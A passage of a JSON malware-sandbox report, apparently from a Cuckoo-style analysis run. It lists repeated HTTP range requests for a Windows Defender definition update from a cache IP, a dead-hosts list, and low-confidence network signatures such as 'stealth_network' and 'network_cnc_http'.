14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196476.282143},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159383552-159907839\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.7\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196484.106943},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=159907840-160432127\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.8\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196489.030389},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=183500800-184025087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.9\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196495.528199},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.10\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196495.921166},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=191889408-192937983\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.11\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196501.19123},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.12\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196506.689561},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.13\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196511.930116},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=141557760-142606335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.14\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196513.61488},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=186646528-187695103\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.15\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196518.467336},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=49283072-50331647\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.16\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196527.801806},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=88080384-89128959\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.17\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196530.808472},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=67108864-68157439\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.18\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196534.916552},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=69206016-70254591\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.19\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196540.195875},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=174063616-175112191\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.20\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196544.222606},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=158334976-159383551\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.21\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196549.495739},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=117440512-118489087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.22\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196552.368131},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=188743680-189792255\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.23\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196558.853297},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=9437184-10485759\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.24\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196560.939378},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=2097152-3145727\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.25\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196567.906336},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=10485760-11534335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.26\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196569.393942},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=85983232-87031807\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.27\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196578.651445},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=34603008-35651583\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.28\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196583.388901},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=167772160-168820735\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.29\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196589.177163},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=78643200-79691775\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.30\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196595.20742},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=38797312-39845887\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.31\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196600.930515},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=13631488-14680063\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.32\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196604.848249},{"count":1,"host":"14.102.231.204","port":80,"data":"GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=201326592-202375167\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.33\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n","uri":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","body":"","path":"/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com","user-agent":"Microsoft-Delivery-Optimization/10.0","version":"1.1","method":"GET","first_seen":1763196611.138772}],"dns":[],"smtp":[],"irc":[],"dead_hosts":[["199.232.210.172",80],["184.24.98.54",443],["150.171.28.12",443],["135.232.92.34",443],["23.209.193.217",443],["23.62.41.126",443],["72.153.5.137",443],["23.218.90.51",443],["23.58.95.152",443],["199.232.210.172",443],["72.153.5.129",443],["52.109.44.110",443]]},"url_analysis":{},"procmemory":[],"signatures":[{"name":"stealth_network","description":"Network activity detected but not expressed in monitor API logs","categories":["stealth"],"severity":1,"weight":1,"confidence":100,"references":[],"data":[{"ip":"52.109.44.110"},{"ip":"72.153.5.129"},{"ip":"23.218.90.51"},{"ip":"72.153.5.137"},{"ip":"23.62.41.126"},{"ip":"23.209.193.217"},{"ip":"135.232.92.34"},{"ip":"150.171.28.12"},{"ip":"184.24.98.54"},{"ip":"199.232.210.172"},{"ip":"23.58.95.152"},{"ip":"23.58.95.138"},{"ip":"13.107.246.48"},{"ip":"20.190.146.38"},{"ip":"104.91.59.106"},{"ip":"104.91.59.130"},{"ip":"14.102.231.204"},{"ip":"23.38.50.202"},{"ip":"52.123.129.14"},{"ip":"23.212.254.112"},{"ip":"104.46.162.226"}],"new_data":[],"alert":false,"families":[]},{"name":"network_cnc_http","description":"HTTP traffic contains suspicious features which may be indicative of malware related traffic","categories":["network","c2"],"severity":2,"weight":1,"confidence":30,"references":[],"data":[{"ip_hostname":"HTTP connection was made to an IP address rather than domain 